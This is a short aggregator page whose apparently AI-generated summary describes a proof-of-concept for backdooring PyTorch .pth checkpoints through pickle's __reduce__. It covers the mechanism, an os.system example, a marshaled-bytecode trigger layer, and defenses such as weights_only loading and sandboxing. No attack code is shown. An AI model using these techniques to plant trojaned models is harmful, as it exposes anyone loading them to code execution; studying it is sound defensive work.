A PoC to make a backdoored PyTorch neural network (hacktelligence.org)

0 points 1 day ago ago | visit original

🤖 AI Summary

Researcher published a proof-of-concept showing how a .pth PyTorch checkpoint can be backdoored because PyTorch serializes model metadata with Python’s pickle. The article walks through how pickle’s __reduce__ mechanism can execute arbitrary code during (un)pickling and shows a basic malicious layer that runs os.system when the file is loaded. It then presents a subtler PoC: a wrapper layer whose __reduce__ dynamically reconstructs a real layer from marshaled bytecode (via compile/marshal and types.FunctionType). The reconstructed layer behaves normally but executes a payload when a specific input trigger (torch.zeros(8)) is seen, demonstrating a functional model that contains a hidden backdoor. This matters because many practitioners download community models (Hugging Face, model zoos) and torch.save/torch.load unpacks a zip containing model/data.pkl (pickle) plus weights — so loading a checkpoint can lead to remote code execution or stealthy behavioral backdoors. Key technical mitigations: torch.load defaults to weights_only=True starting in PyTorch 2.6, which prevents arbitrary object unpickling; loading with weights_only=False restores the unsafe behavior. Practical defenses include only trusting vetted sources, inspecting archives (unzip and audit data.pkl), using weights-only loading, sandboxing/VMs for untrusted checkpoints, and employing static or behavioral checks for anomalous layers or triggers.

Loading comments...

loading comments...